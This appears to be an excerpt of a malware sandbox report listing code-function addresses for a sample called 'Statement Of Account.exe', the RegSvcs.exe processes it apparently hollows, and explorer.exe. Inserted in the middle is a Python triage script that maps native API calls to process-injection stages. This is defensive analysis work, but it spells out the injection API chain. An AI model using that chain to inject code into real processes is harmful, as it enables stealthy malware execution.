Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2EE0 NtQueueApcThread, 8_2_00FB2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2E30 NtWriteVirtualMemory, 8_2_00FB2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2FA0 NtQuerySection, 8_2_00FB2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2F60 NtCreateProcessEx, 8_2_00FB2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB3090 NtSetValueKey, 8_2_00FB3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB3010 NtOpenDirectoryObject, 8_2_00FB3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB35C0 NtCreateMutant, 8_2_00FB35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB39B0 NtGetContextThread, 8_2_00FB39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB3D70 NtOpenThread, 8_2_00FB3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB3D10 NtOpenProcessToken, 8_2_00FB3D10
Source: C:\Windows\explorer.exe Code function: 9_2_0F905E12 NtProtectVirtualMemory, 9_2_0F905E12
Source: C:\Windows\explorer.exe Code function: 9_2_0F904232 NtCreateFile, 9_2_0F904232
Source: C:\Windows\explorer.exe Code function: 9_2_0F905E0A NtProtectVirtualMemory, 9_2_0F905E0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041A360 NtCreateFile, 14_2_0041A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041A410 NtReadFile, 14_2_0041A410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041A490 NtClose, 14_2_0041A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041A540 NtAllocateVirtualMemory, 14_2_0041A540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041A35A NtCreateFile, 14_2_0041A35A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041A53B NtAllocateVirtualMemory, 14_2_0041A53B
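The native-API names listed above for analysis process 8 (the first RegSvcs.exe instance) are the raw building blocks behind the report's injection signatures: NtCreateProcessEx and NtCreateSection/NtMapViewOfSection to spawn a target and map the payload into it, NtWriteVirtualMemory to write foreign memory, NtSetContextThread plus NtResumeThread for the hollowing / thread-hijack step, and NtQueueApcThread for APC injection. The Python below is an added triage example, not part of the Joe Sandbox report or of the sample: it parses a constructed subset of the "Code function" lines above, groups the Nt* calls by the leading number of each `N_2_addr` tag (the analysis process number: 8, 9 and 14 here), and reports which injection stages each process covers. The stage names and the chain logic are this example's own heuristic; a call being present in a process's code does not by itself prove cross-process use, so the report's behavioural signatures ("Writes to foreign memory regions", "Modifies the context of a thread in another process") remain the authoritative evidence.

```python
import re

# Constructed sample: a subset of the "Code function" lines from the report above.
SAMPLE_LINES = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2D10 NtMapViewOfSection,LdrInitializeThunk, 8_2_00FB2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2FB0 NtResumeThread,LdrInitializeThunk, 8_2_00FB2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2F30 NtCreateSection,LdrInitializeThunk, 8_2_00FB2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB4340 NtSetContextThread, 8_2_00FB4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2EE0 NtQueueApcThread, 8_2_00FB2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2E30 NtWriteVirtualMemory, 8_2_00FB2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2F60 NtCreateProcessEx, 8_2_00FB2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101A118 8_2_0101A118
Source: C:\Windows\explorer.exe Code function: 9_2_0F905E12 NtProtectVirtualMemory, 9_2_0F905E12
Source: C:\Windows\explorer.exe Code function: 9_2_0F904232 NtCreateFile, 9_2_0F904232
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041A360 NtCreateFile, 14_2_0041A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041A540 NtAllocateVirtualMemory, 14_2_0041A540
"""

# One report line: "<image> Code function: <proc>_<stage>_<addr> <Api,Api,> <proc>_<stage>_<addr>".
# Lines without a resolved API name carry only the two identical tags.
LINE_RE = re.compile(
    r"^Source: (?P<image>.+?) Code function: "
    r"(?P<proc>\d+)_(?P<stage>\d+)_(?P<addr>[0-9A-Fa-f]+) "
    r"(?P<apis>(?:[A-Za-z0-9_]+,)*)\s*(?P=proc)_(?P=stage)_(?P=addr)\s*$"
)

# Injection primitives and the stage each serves. This mapping is the example's
# own heuristic, not something the report states.
PRIMITIVES = {
    "NtCreateProcessEx": "spawn target",
    "NtOpenProcess": "open target",
    "NtCreateSection": "map payload",
    "NtMapViewOfSection": "map payload",
    "NtAllocateVirtualMemory": "allocate foreign memory",
    "NtWriteVirtualMemory": "write foreign memory",
    "NtProtectVirtualMemory": "change protection",
    "NtGetContextThread": "hijack thread",
    "NtSetContextThread": "hijack thread",
    "NtQueueApcThread": "queue APC",
    "NtResumeThread": "resume thread",
}


def parse_report(text):
    """Group the Nt* names seen in 'Code function' lines by analysis process number."""
    procs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        entry = procs.setdefault(int(m["proc"]), {"image": m["image"], "apis": set()})
        entry["apis"].update(a for a in m["apis"].split(",") if a)
    return procs


def injection_verdict(apis):
    """Return (verdicts, stages): which injection chains the observed calls complete."""
    stages = {PRIMITIVES[a] for a in apis if a in PRIMITIVES}
    payload = stages & {"map payload", "write foreign memory"}
    verdicts = []
    # Hollowing needs a way to place the payload, a thread-context rewrite and a resume.
    if payload and "hijack thread" in stages and "resume thread" in stages:
        verdicts.append("process hollowing / thread hijack")
    # APC injection needs a placed payload plus NtQueueApcThread.
    if payload and "queue APC" in stages:
        verdicts.append("APC injection")
    return verdicts, stages


if __name__ == "__main__":
    for proc, info in sorted(parse_report(SAMPLE_LINES).items()):
        verdicts, stages = injection_verdict(info["apis"])
        print(f"process {proc} ({info['image']}): stages={sorted(stages)} "
              f"verdict={verdicts or ['none']}")
```

Run against the full "Code function" list the same way; only process 8 completes a chain in the subset above, which matches the report's own conclusion that the first RegSvcs.exe instance performs the hollowing. The subset deliberately includes a line with no resolved API (`8_2_0101A118 8_2_0101A118`) to show that such lines parse cleanly and contribute nothing.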
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_014ADCD4 0_2_014ADCD4
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A2B4E8 0_2_07A2B4E8
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A2B4D8 0_2_07A2B4D8
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A29478 0_2_07A29478
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A2B0B0 0_2_07A2B0B0
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A2B09F 0_2_07A2B09F
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A2BE98 0_2_07A2BE98
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A20C49 0_2_07A20C49
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A20C58 0_2_07A20C58
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A298A3 0_2_07A298A3
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A298B0 0_2_07A298B0
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A22838 0_2_07A22838
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101A118 8_2_0101A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01008158 8_2_01008158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010341A2 8_2_010341A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010401AA 8_2_010401AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010381CC 8_2_010381CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F70100 8_2_00F70100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103A352 8_2_0103A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010403E6 8_2_010403E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E3F0 8_2_00F8E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010002C0 8_2_010002C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01040591 8_2_01040591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01024420 8_2_01024420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01032446 8_2_01032446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80535 8_2_00F80535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102E4F6 8_2_0102E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9C6E0 8_2_00F9C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7C7C0 8_2_00F7C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 8_2_00F80770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA4750 8_2_00FA4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE8F0 8_2_00FAE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F668B8 8_2_00F668B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0104A9A6 8_2_0104A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8A840 8_2_00F8A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F82840 8_2_00F82840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F96962 8_2_00F96962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103AB40 8_2_0103AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01036BD7 8_2_01036BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F70CF2 8_2_00F70CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101CD1F 8_2_0101CD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80C00 8_2_00F80C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7ADE0 8_2_00F7ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F98DBF 8_2_00F98DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020CB5 8_2_01020CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8AD00 8_2_00F8AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01022F30 8_2_01022F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F88ECF 8_2_00F88ECF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F92E90 8_2_00F92E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80E59 8_2_00F80E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8CFE0 8_2_00F8CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103EE26 8_2_0103EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F72FC8 8_2_00F72FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFEFA0 8_2_00FFEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103CE93 8_2_0103CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF4F40 8_2_00FF4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA0F30 8_2_00FA0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FC2F28 8_2_00FC2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103EEDB 8_2_0103EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F870C0 8_2_00F870C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0104B16B 8_2_0104B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8B1B0 8_2_00F8B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6F172 8_2_00F6F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB516C 8_2_00FB516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102F0CC 8_2_0102F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103F0E0 8_2_0103F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010370E9 8_2_010370E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9D2F0 8_2_00F9D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103132D 8_2_0103132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9B2C0 8_2_00F9B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F852A0 8_2_00F852A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F833F3 8_2_00F833F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FC739A 8_2_00FC739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6D34C 8_2_00F6D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010212ED 8_2_010212ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F83497 8_2_00F83497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01037571 8_2_01037571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F71460 8_2_00F71460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101D5B0 8_2_0101D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010495C3 8_2_010495C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103F43F 8_2_0103F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103F7B0 8_2_0103F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FC5630 8_2_00FC5630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010316CC 8_2_010316CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01015910 8_2_01015910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F838E0 8_2_00F838E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F71840 8_2_00F71840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FED800 8_2_00FED800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F89950 8_2_00F89950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9B950 8_2_00F9B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FC5AA0 8_2_00FC5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103FB76 8_2_0103FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF3A6C 8_2_00FF3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FBDBF9 8_2_00FBDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF5BF0 8_2_00FF5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01037A46 8_2_01037A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103FA49 8_2_0103FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9FB80 8_2_00F9FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01021AA3 8_2_01021AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101DAAC 8_2_0101DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102DAC6 8_2_0102DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01031D5A 8_2_01031D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01037D73 8_2_01037D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF9C32 8_2_00FF9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9FDC0 8_2_00F9FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F83D40 8_2_00F83D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103FCF2 8_2_0103FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103FF09 8_2_0103FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F89EB0 8_2_00F89EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103FFB1 8_2_0103FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F81F92 8_2_00F81F92
Source: C:\Windows\explorer.exe Code function: 9_2_0F41BB30 9_2_0F41BB30
Source: C:\Windows\explorer.exe Code function: 9_2_0F41BB32 9_2_0F41BB32
Source: C:\Windows\explorer.exe Code function: 9_2_0F421232 9_2_0F421232
Source: C:\Windows\explorer.exe Code function: 9_2_0F418D02 9_2_0F418D02
Source: C:\Windows\explorer.exe Code function: 9_2_0F41E912 9_2_0F41E912
Source: C:\Windows\explorer.exe Code function: 9_2_0F4245CD 9_2_0F4245CD
Source: C:\Windows\explorer.exe Code function: 9_2_0F420036 9_2_0F420036
Source: C:\Windows\explorer.exe Code function: 9_2_0F417082 9_2_0F417082
Source: C:\Windows\explorer.exe Code function: 9_2_0F904232 9_2_0F904232
Source: C:\Windows\explorer.exe Code function: 9_2_0F9075CD 9_2_0F9075CD
Source: C:\Windows\explorer.exe Code function: 9_2_0F901912 9_2_0F901912
Source: C:\Windows\explorer.exe Code function: 9_2_0F8FBD02 9_2_0F8FBD02
Source: C:\Windows\explorer.exe Code function: 9_2_0F8FEB32 9_2_0F8FEB32
Source: C:\Windows\explorer.exe Code function: 9_2_0F8FEB30 9_2_0F8FEB30
Source: C:\Windows\explorer.exe Code function: 9_2_0F8FA082 9_2_0F8FA082
Source: C:\Windows\explorer.exe Code function: 9_2_0F903036 9_2_0F903036
Source: C:\Windows\explorer.exe Code function: 9_2_1098B082 9_2_1098B082
Source: C:\Windows\explorer.exe Code function: 9_2_10994036 9_2_10994036
Source: C:\Windows\explorer.exe Code function: 9_2_109985CD 9_2_109985CD
Source: C:\Windows\explorer.exe Code function: 9_2_10992912 9_2_10992912
Source: C:\Windows\explorer.exe Code function: 9_2_1098CD02 9_2_1098CD02
Source: C:\Windows\explorer.exe Code function: 9_2_10995232 9_2_10995232
Source: C:\Windows\explorer.exe Code function: 9_2_1098FB30 9_2_1098FB30
Source: C:\Windows\explorer.exe Code function: 9_2_1098FB32 9_2_1098FB32
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_00DADCD4 11_2_00DADCD4
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FC9780 11_2_06FC9780
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FC9778 11_2_06FC9778
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FCB3B8 11_2_06FCB3B8
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FC9348 11_2_06FC9348
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FCAF80 11_2_06FCAF80
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FCAF6F 11_2_06FCAF6F
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FC0C58 11_2_06FC0C58
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FC0C49 11_2_06FC0C49
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FCBD68 11_2_06FCBD68
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FC2828 11_2_06FC2828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00401028 14_2_00401028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00401030 14_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041D9B7 14_2_0041D9B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041E214 14_2_0041E214
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041ECEE 14_2_0041ECEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00402D88 14_2_00402D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00402D90 14_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00409E5B 14_2_00409E5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00409E60 14_2_00409E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041D6A4 14_2_0041D6A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00402FB0 14_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014F516C 14_2_014F516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014AF172 14_2_014AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014CB1B0 14_2_014CB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C0000 14_2_014C0000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C70C0 14_2_014C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014AD34C 14_2_014AD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014DD2F0 14_2_014DD2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C52A0 14_2_014C52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014B1460 14_2_014B1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014CB730 14_2_014CB730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014BC7C0 14_2_014BC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014B17EC 14_2_014B17EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C9950 14_2_014C9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014DB950 14_2_014DB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014D6962 14_2_014D6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C5990 14_2_014C5990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C29A0 14_2_014C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C38E0 14_2_014C38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014B28F0 14_2_014B28F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014EE8F0 14_2_014EE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014A68B8 14_2_014A68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014FDBF9 14_2_014FDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01489B80 14_2_01489B80
